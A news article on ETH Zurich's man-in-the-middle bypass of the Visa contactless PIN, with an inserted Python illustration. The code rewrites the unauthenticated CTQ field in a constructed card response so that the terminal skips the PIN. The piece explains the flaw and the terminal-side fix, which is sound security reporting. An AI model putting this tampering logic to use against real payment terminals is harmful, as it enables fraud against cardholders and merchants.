Researchers bypass the Visa card PIN with a man-in-the-middle attack


Swiss security researchers have found a way to bypass the PIN on Visa cards. To do it, they used a self-built app and paid with a phone instead of the card itself.

The research was carried out by scientists at the Swiss Federal Institute of Technology (ETH Zurich). They discovered a method to carry out a man-in-the-middle attack on Visa card payments made with a phone. The researchers used a self-built app that makes one smartphone emulate a card. A second phone running the app is also needed; it emulates a payment terminal.

The phone emulating the payment terminal is held against a Visa card to read it. The app on that phone relays the card's responses to the other phone, but modifies them so that the card appears not to require a PIN. The second phone, emulating the card, is then held against a real terminal in a shop to pay. In this way the researchers can make large payments in a shop without having to enter the PIN.

The vulnerability lies in the EMV protocol, which various payment providers support, and specifically in Visa's proprietary contactless payment protocol. It concerns the way the cardholder is verified during a transaction. According to the researchers, the data that tells the terminal how the cardholder must be verified can be modified in transit: the terminal asks for no further authentication of it and it is not protected by cryptography. That data is the Card Transaction Qualifiers (CTQ), a field the card sends to the terminal. By modifying the CTQ, the researchers tricked the terminal into believing that no PIN was needed. The scientists found the vulnerability by formally modelling the protocol with the Tamarin prover, and then built an app themselves to confirm it.
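To make the relay described in the two paragraphs above concrete, here is an added illustration (not the researchers' app, and not Visa's or any terminal vendor's code) of what the terminal-emulating phone does to the card's response before passing it on. It assumes a minimal BER-TLV subset, a constructed GET PROCESSING OPTIONS response, and the CTQ bit layout as described in the ETH paper (byte 1 bit 8 = "Online PIN Required", byte 1 bit 7 = "Signature Required", byte 2 bit 8 = "Consumer Device CVM Performed"); the terminal-side decision function is a simplified stand-in for the real Visa kernel logic.

```python
"""Illustrative man-in-the-middle rewrite of the Card Transaction Qualifiers
(CTQ, tag 9F6C) in a Visa contactless GET PROCESSING OPTIONS response.

Added teaching example: the card response is constructed, the TLV parser
handles only the subset needed here, and terminal_cvm_decision() is a
simplified model of how a terminal reads the CTQ, not real kernel code.
"""

CTQ_TAG = b"\x9f\x6c"


def parse_tlv(data):
    """Parse a flat sequence of BER-TLV objects (1- or 2-byte tags, short-form
    or single-byte long-form lengths) into a list of (tag, value) pairs.
    Constructed tags such as 77 come back with their raw value so the caller
    can recurse."""
    out = []
    i = 0
    while i < len(data):
        tag = data[i:i + 1]
        i += 1
        if tag[0] & 0x1F == 0x1F:          # second tag byte follows (e.g. 9F6C)
            tag += data[i:i + 1]
            i += 1
        length = data[i]
        i += 1
        if length & 0x80:                  # long form: 0x81 then one length byte
            nbytes = length & 0x7F
            length = int.from_bytes(data[i:i + nbytes], "big")
            i += nbytes
        out.append((tag, data[i:i + length]))
        i += length
    return out


def build_tlv(objs):
    """Serialise (tag, value) pairs back to BER-TLV (lengths up to 255)."""
    out = b""
    for tag, value in objs:
        if len(value) < 0x80:
            out += tag + bytes([len(value)]) + value
        else:
            out += tag + b"\x81" + bytes([len(value)]) + value
    return out


def get_ctq(gpo_response):
    """Extract the CTQ value from a response-template-77 GPO response."""
    (_, body), = parse_tlv(gpo_response)
    return dict(parse_tlv(body))[CTQ_TAG]


def terminal_cvm_decision(ctq):
    """Simplified terminal view: which cardholder verification method does the
    (unauthenticated) CTQ ask for?  A claimed consumer-device CVM wins, so the
    terminal asks for nothing further."""
    online_pin_required = bool(ctq[0] & 0x80)   # byte 1, bit 8
    signature_required = bool(ctq[0] & 0x40)    # byte 1, bit 7
    cdcvm_performed = bool(ctq[1] & 0x80)       # byte 2, bit 8
    if cdcvm_performed:
        return "no PIN (consumer device CVM claimed)"
    if online_pin_required:
        return "online PIN"
    if signature_required:
        return "signature"
    return "no CVM"


def mitm_rewrite_ctq(gpo_response):
    """What the terminal-emulator phone does to the real card's response before
    relaying it to the card-emulator phone: clear 'Online PIN Required' and set
    'Consumer Device CVM Performed' in tag 9F6C.  Every other field, including
    the card's cryptogram, is passed through untouched; because the CTQ is not
    covered by any cryptographic check, the real terminal accepts the change."""
    (outer_tag, body), = parse_tlv(gpo_response)   # response template 77
    assert outer_tag == b"\x77"
    objs = []
    for tag, value in parse_tlv(body):
        if tag == CTQ_TAG:
            ctq = bytearray(value)
            ctq[0] &= ~0x80 & 0xFF     # Online PIN Required -> 0
            ctq[1] |= 0x80             # Consumer Device CVM Performed -> 1
            value = bytes(ctq)
        objs.append((tag, value))
    return build_tlv([(outer_tag, build_tlv(objs))])


# Constructed GPO response (tag 77) with an AIP, an AFL and a CTQ that says an
# online PIN is required.  Real responses carry more fields; the values of the
# AIP and AFL here are placeholders.
CARD_RESPONSE = build_tlv([(b"\x77", build_tlv([
    (b"\x82", b"\x20\x00"),            # Application Interchange Profile
    (b"\x94", b"\x08\x01\x01\x00"),    # Application File Locator
    (CTQ_TAG, b"\x80\x00"),            # CTQ: Online PIN Required
]))])

if __name__ == "__main__":
    print("card asks for:     ", terminal_cvm_decision(get_ctq(CARD_RESPONSE)))
    relayed = mitm_rewrite_ctq(CARD_RESPONSE)
    print("terminal is told:  ", terminal_cvm_decision(get_ctq(relayed)))
```

The point the example makes is the one in the text: the rewrite touches only two bits of a field that nothing in the transaction authenticates, so the terminal, seeing a card that claims the cardholder was already verified on a consumer device, never prompts for the PIN. A terminal-side fix therefore has to stop trusting the CTQ alone for this decision; the card and the EMV standard itself do not need to change.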

The researchers say the app they built works on any Android phone and needs no root permissions. They not only showed a proof-of-concept but also carried out test transactions in several real shops. After the discovery, the researchers say they approached Visa with possible fixes. The EMV protocol does not need to change and no new cards need to be issued, but Visa does need to fix existing terminals via a software update. The paper does not state whether the company has already done so.
